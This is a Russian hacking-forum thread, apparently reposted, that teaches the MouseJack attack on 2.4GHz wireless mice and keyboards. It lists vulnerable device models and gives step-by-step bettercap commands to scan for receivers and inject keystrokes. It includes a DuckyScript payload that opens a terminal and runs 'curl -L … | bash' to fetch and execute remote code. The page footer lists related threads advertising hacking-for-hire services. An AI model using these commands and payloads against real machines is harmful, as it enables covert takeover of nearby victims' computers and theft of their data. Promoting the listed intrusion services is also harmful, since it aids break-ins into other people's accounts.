Интересно Взлом компьютера через беспроводную мышь или клавиатуру

J

Jony14

Original poster
1593986750308.png
Самый большой риск компрометации компьютера, с точки зрения информационной безопасности, возникает при непосредственном доступе к нему посторонних. При физическом доступе к компьютеру будет возможным скопировать информацию даже не зная пароля входа в систему. Также при непосредственном доступе можно скачать и запустить вредоносный файл (бэкдор) для скрытого управления компьютером.

Сейчас довольно популярны беспроводные

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

устройства, работающие на 2.4Ghz: клавиатуры и мыши. При этом некоторые из них содержат уязвимости и подвержены атаке MouseJack. А это означает, что через подключённую к компьютеру беспроводную мышь или клавиатуру можно передавать сочетания клавиш и строки, что в свою очередь означает, что можно, к примеру, передать сочетания клавиш для открытия командной строки, ввести в неё любую команду и выполнить. Можно симулировать любые действия пользователя, которые он может выполнить с помощью клавиатуры и мыши.


Атака MouseJack

В Bettercap добавлен модуль HID on 2.4Ghz, который является реализацией атаки Bastille’s mousejack.

MouseJack — это класс уязвимостей, которые охватывают большое разнообразие беспроводных, не-Bluetooth клавиатур и компьютерных мышей. Эта периферия «подключена» к хостовому компьютеру с использованием радио передатчика, обычно маленького USB устройства. Поскольку подключение является беспроводным, и информация о перемещении мыши и нажатых клавишах передаётся по воздуху, то становится возможным скомпрометировать компьютер жертвы, передав специально составленный радио сигнал, это возможно сделать с помощью устройства ценой $15.

Атакующий может запустить атаку на расстоянии до 100 метров. Атакующий может взять под контроль целевой компьютер не находясь физически перед ним и печатать произвольный текст или отправлять скриптовые команды. Поэтому возможно быстро выполнять вредоносные действия, не будучи обнаруженными.

Эксплойт MouseJack сосредотачивается вокруг введения незашифрованных нажатий клавиш в целевой компьютер. Движения мыши обычно отправляются в незашифрованном виде, а нажатия клавиш часто шифруются (для предотвращения прослушивания набираемого текста). Однако уязвимость MouseJack использует уязвимые приёмные ключи и связанное с ними программное обеспечение, позволяя передавать незашифрованные нажатия клавиш, вводимые злоумышленником в операционную систему компьютера, как если бы сам пользователь компьютера печатал их сидя перед ним.

Кто уязвим?

В: У меня есть клавиатура/мышь Bluetooth. Я уязвим?

О: Не для MouseJack. Bluetooth использует совершенно другую систему передачи и шифрования, которая не подвержена этой атаке.

В: Сколько времени занимает взлом моего ноутбука с помощью MouseJack?

О: Компрометация с помощью MouseJack может произойти за считанные секунды. Не думайте, что злоумышленнику нужно несколько минут использовать клавиатуру/мышь, просматривая ваши интересные электронные письма. Примерно за десять секунд в ваш компьютер могут быть внесены изменения, чтобы злоумышленник мог удалённо скачивать документы, все ваши электронные письма, а также добавлять или удалять программы.

В: При каких условиях мой ноутбук уязвим?

О: Ваш ноутбук может быть «взломан» с расстояния до 100 метров. Вы можете быть в офисе, и посетитель взламывает вас на стойке регистрации, вы можете быть дома, и хакер атакует вас с улицы, вы можете быть в кафе, а другой клиент взламывает вас. Та же угроза существует в аэропорту, самолёте или во многих других ситуациях.

Итог: если ваш компьютер включён и подключён уязвимый приёмник радиосигналов, он может быть уязвим для MouseJack.

Устройства для сканирования и инъекции фреймов при атаках на HID устройства

Необходимо одно из следующих устройств, на которые установлена прошивка

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

:

  • Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


    1

  • Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


    1

  • Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.


    1
Для успешного обнаружения и атаки на HID, необходимо убедиться, что установлена прошивка

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

на одно из перечисленных выше устройств.

После установки соответствующей прошивки и подключении к вашему компьютеру, dmesg будет сообщать об устройствах примерно следующее:
Код:Скопировать в буфер обмена
usb 3-1.3: new full-speed USB device number 8 using xhci_hcd
usb 3-1.3: New USB device found, idVendor=1915, idProduct=0102
usb 3-1.3: New USB device strings: Mfr=1, Product=2, SerialNumber=0
usb 3-1.3: Product: Research Firmware
usb 3-1.3: Manufacturer: RFStorm
Уязвимые к атаке HID устройства на 2.4Ghz

Далее показана атака с использованием определённого железа и конкретной программы — для этой атаки составлен список подверженных устройств, про которые известны, что их возможно обнаружить и сделать инъекцию

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

(полезной нагрузки, написанной на специальном скриптовом языке). Это не означает, что другие устройства не подвержены атаке HID, данный список составлен для указанных условий.

Итак, описанными ниже методами можно обнаружить и атаковать компьютеры, к которым подключено одно из следующих устройств:
  • Microsoft Wireless Keyboard 800
  • Microsoft Wireless Mouse 1000
  • Microsoft Wireless Mobile Mouse 3500
  • Microsoft All-In-One Media Keyboard
  • Microsoft Sculpt Ergonomic Mouse
  • Logitech Wireless Touch Keyboard K400r
  • Logitech Marathon M705 Mouse
  • Logitech Wave M510 Mouse
  • Logitech Wireless Gaming Mouse G700s
  • Logitech Wireless M325 Mouse
  • Logitech K750 Wireless Keyboard
  • Logitech K320 Wireless Keyboard
  • Dell KM636 Wireless Mouse and Keyboard
  • AmazonBasics MG-0975 Wireless Mouse

Программы для атаки на HID

Для поиска HID устройств и беспроводной инъекции подходит программа

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

. Полезной нагрузкой будут скрипты

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

.

Команды bettercap

Запуск сканирования HID устройств на частоте 2.4Ghz:
Код:
hid.recon on
Остановка сканирования HID устройств на частоте 2.4Ghz:
Код:
hid.recon off
Очистить список всех устройств, собранных с помощью модуля обнаружения HID:
Код:
hid.clear
Показать список собранных HID устройств на частоте 2.4Ghz:
Код:
hid.show
Начать сниффинг указанного АДРЕСА чтобы собрать полезные нагрузки, используйте «clear» для остановки сбора:
Код:
hid.sniff АДРЕС
Разбирает ФАЙЛ DuckyScript и внедряет его в HID фреймы используя спуфинг (подмену) АДРЕСА устройства, используя РАСКЛАДКУ клавиатуры (доступные раскладки: BE BR CA CH DE DK ES FI FR GB HR IT NO PT RU SI SV TR US):
Код:
hid.inject АДРЕС РАСКЛАДКА ФАЙЛ
Команда hid.inject не требует, чтобы HID устройство было предварительно обнаружено с помощью команды hid.show. Если вы уже знаете адрес приёмника беспроводного сигнала, вы можете просто установить параметр hid.force.type на один из ogitech (значение по умолчанию), amazon или microsoft и запустить инъекцию «вслепую».

Примеры выполнения атаки

Запуск bettercap:
Код:
sudo bettercap
1. С помощью модуля ticker настраивается регулярное обновление на экране информация о HID устройствах:
Код:
set ticker.commands clear; hid.show; events.show 10
Включение обнаружения HID:
Код:
hid.recon on
Включение модуля ticker:
Код:
ticker on
Ожидаем обнаружение устройства 32:26:9f:a4:08. Затем внедряем скрипт ducky.txt как HID фреймы, используя раскладку клавиатуры US:
Код:
hid.inject 32:26:9f:a4:08 US ducky.txt
2. Отправляем скрипт ducky.txt с нажатиями клавиш на приёмник с адресом 32:26:9f:a4:08, принудительно устанавливаем его тип на logitech, команды выполняются без ожидания обнаружения подключённого устройства:
Код:
set hid.force.type logitech
hid.recon on
hid.inject 32:26:9f:a4:08 US ducky.txt
Пример файла ducky.txt:
Код:
GUI SPACE
DELAY 200
STRING Terminal
ENTER
DELAY 500
STRING curl -L

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

| bash
ENTER
Дополнительные примеры полезной нагрузки будут даны ниже, рассмотрим основы этого скриптового языка:
  • DELAY x – Задержка в миллисекундах
  • STRING abcdefghij – Напечатать следующие символы
  • GUI – Кнопка меню Windows (также вызывает меню в Linux)
  • GUI r – Окно запуска команды Windows
  • COMMAND – Кнопка команд OSX
  • UP | UPARROW – Стрелка вверх
  • DOWN | DOWNARROW – Стрелка вниз
  • LEFT | LEFTARROW – Стрелка влево
  • RIGHT | RIGHTARROW – Стрелка вправо
  • CAPS |CAPSLOCK – Кнопка Capslock
  • ENTER – Кнопка Enter
  • SPACE – Пробел
  • REPEAT x – Повторить следующую команду X раз.
  • CTRL ESC — На Windows 10, видимо, GUI не работает, поэтому в качестве альтернативы используйте это сочетание.
  • CTRL ALT t — открывает терминал в Linux
  • ALT F2 — Окно запуска команды на Linux. Для открытия настоящего терминала можно ввести «gnome-terminal» или «xterm».
Вы можете даже использовать некоторые (но не все) комбинации из двух и трёх клавиш:
  • SHIFT-ENTER
  • CTRL-ALT-DEL
  • ALT-F4

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

(на английском).

Видео атаки

На видео показано, как программа обнаруживает 2 HID устройства и на одно из них отправляет команду, которая запускает программу на втором компьютере (открывает калькулятор).



Примеры полезной нагрузки для отправки на HID

Большая подборка скриптов эксплуатации беспроводных мышек и клавиатур:

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.



Некоторые полезные нагрузки отсутствуют в этом перечне, но присутствуют в самой вики — поэтому смотрите также список страниц (в правой части экрана). Примеры отсутствующих в главном меню:
Тема слита с форума Пиратская бухта(

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

)
 
S

StanislavP

Original poster
Ниху*се. Я слышал только про USB Stealer)
 
Название темы
Автор Заголовок Раздел Ответы Дата
Denik Интересно Взлом компьютера через презентацию Уязвимости и взлом 4
Denik Интересно Взлом компьютера одной фразой PasteZort Уязвимости и взлом 1
Support81 Взлом или небрежность? Код и пароли Binance были доступны на GitHub в течение нескольких месяцев Новости в сети 0
Support81 Взлом KyberSwap: математика помогла хакеру украсть $47 млн Новости в сети 0
Support81 Взлом криптобиржи Poloniex принёс ущерб в $100 млн. Новости в сети 0
Траблшутер Продавец Взлом почты/соц.сети/мессенджеры Ищу работу. Предлагаю свои услуги. 1
W Заказать услуги Хакера,Взлом на заказ от [email protected] взлом базы данных,удаленный доступ (telegram,Viber,Whatsapp,Gmail,vk.com,OK.ru) Если Корзина 0
W Заказать услуги Хакера,Доступ до БД сайтов,Взлом Сайтов,Взлом на заказ от [email protected] -решение проблем по взлому. Корзина 0
B SERVICE HACKEP [email protected] Услуги Взлома на заказ,заказать услуги взлома,взлом на заказ,сервис взлома. 1. Взлом мессенджеров сообщений: Корзина 0
K Взлом WiFi через Кали линукс с рут правами Вопросы и интересы 3
H Услуги взлома: ВК, WhatsApp, Viber, Instagram / E-mail / Взлом сайтов Корзина 0
L Взлом ВКонтакте на заказ от Фантомаса Ищу работу. Предлагаю свои услуги. 4
B Взлом электронной почты, без предоплаты. Ищу работу. Предлагаю свои услуги. 0
L Интересно Взлом мастер пароля firefox (key4.db) Бруты/Парсеры/Чекеры 0
D Оптовый взлом почты на заказ (цена 20$) Взлом почты Mail.ru Yandex.ru Rambler.ru Ищу работу. Предлагаю свои услуги. 0
V Взлом|Hack|HackMessenger|соц сети мессенджеры почты Корзина 0
ananda Интересно Взлом Wrapped LEO на сумму $42 000 Новости в сети 0
H Взлом без предоплат писать на [email protected]!,Ok.ru,WhatsApp на заказ! Не нужно писать в ЛС на форуме. Все контакты указаны ниже Пишите на поч Корзина 0
Admin Интересно Взлом BHF, карты раскрыты Новости в сети 21
B Взлом почты mail.ru , rambler, yandex, корп.почт Ищу работу. Предлагаю свои услуги. 1
H HackService(Услуги Взлома) [email protected] - решение проблем по взлому (Корпоративная,Viber,Whatsapp) 1. Взлом мессенджеров сообщений: 1.1 Взл Корзина 1
CMDfromBAT Интересно Взлом почты при помощи Hydra в Kali Linux Уязвимости и взлом 2
M Услуги хакера и взлом на заказ Заказать взлом? - пишите нам [email protected] Взлом сайта, взлом форума - на заказ! Хотите узнать с кем общается В Корзина 0
Eteriass Интересно Мой арсенал для пентеста. Глава 1. Взлом wifi Полезные статьи 4
3 Взлом вашей второй Половинки или Конкурента связь [email protected] Eсли вы хотите узнать что делает ваша вторая половинка в сети пишем нам на почту Корзина 0
P Взлом Хорошие цены связь [email protected]!,Ok.ru,WhatsApp на заказ! Не нужно писать в ЛС на форуме. Все контакты указаны ниже Чтобы сделать Корзина 0
P Взлом Хорошие цены связь [email protected]!,Ok.ru,WhatsApp на заказ! Не нужно писать в ЛС на форуме. Все контакты указаны ниже Чтобы сделать Корзина 0
X Взлом вашей второй Половинки или Конкурента связь [email protected] Eсли вы хотите узнать что делает ваша вторая половинка в сети пишем нам на поч Ищу работу. Предлагаю свои услуги. 1
P Качественный подбор паролей (vk.comOk.ru,WhatsApp.Viber) от [email protected] Взлом сайта, взлом форума - на заказ! Хотите узнать с кем обща Корзина 0
Denik Интересно Взлом WINDOWS 10 с помощью TORAT Уязвимости и взлом 4
Ltybcrf Интересно Взлом mail.ru + Способ удаления телефона с mail.ru Уязвимости и взлом 3
2 Взлом камер видеонаблюдения через браузер Уязвимости и взлом 24
Denik Интересно Взлом Qiwi кошелька Уязвимости и взлом 2
U Взлом ПК при помощи названия папки. Уязвимости и взлом 0
Fiora взлом почты gmail, mail, yandex, yahoo. Взлом социальных сетей (VK, OK,Facebook даже при наличии двухфакторной аутентификации) взлом whatsapp. Вопросы и интересы 6
S [Взлом почты на заказ] Mail.Ru, Yandex.Ru, Rambler.Ru, Ukr.net, Gmail.Com Ищу работу. Предлагаю свои услуги. 0
A Взлом wifi Вопросы и интересы 9
D Взлом без предоплаты WhatsApp instagram vk viber Уязвимости и взлом 1
V Взлом удаление информации в сети Корзина 0
V Взлом удаление информации в сети Корзина 0
N Взлом распечатка СМС и звонков Уязвимости и взлом 1
АнАлЬнАя ЧуПаКаБрА Интересно Взлом и бесплатная подписка (-95% скидка ) на в любом прокси селлере (способ снятия ограничения) Раздача dedic/ssh/proxy 1
N Взлом ВКонтакте от NEMAFIA. Быстро. Недорого. Без предоплаты. Корзина 0
F Взлом сайта Предоставляю работу. Ищу специалиста. 0
B Взлом (соц. сети, мессенджеры и почты) Ищу работу. Предлагаю свои услуги. 1
N Взлом без предоплаты Корзина 0
S Взлом от имени гендира. Машинное обучение как новый инструмент хакера Полезные статьи 1
M Взлом с помощью изображений атакой Polyglot Полезные статьи 1
S Взлом Mail.ru, Яndex, Gmai, VK. Ищу работу. Предлагаю свои услуги. 11
R Взлом защиты программы SysTools PDF Unlocker Полезные статьи 0

Название темы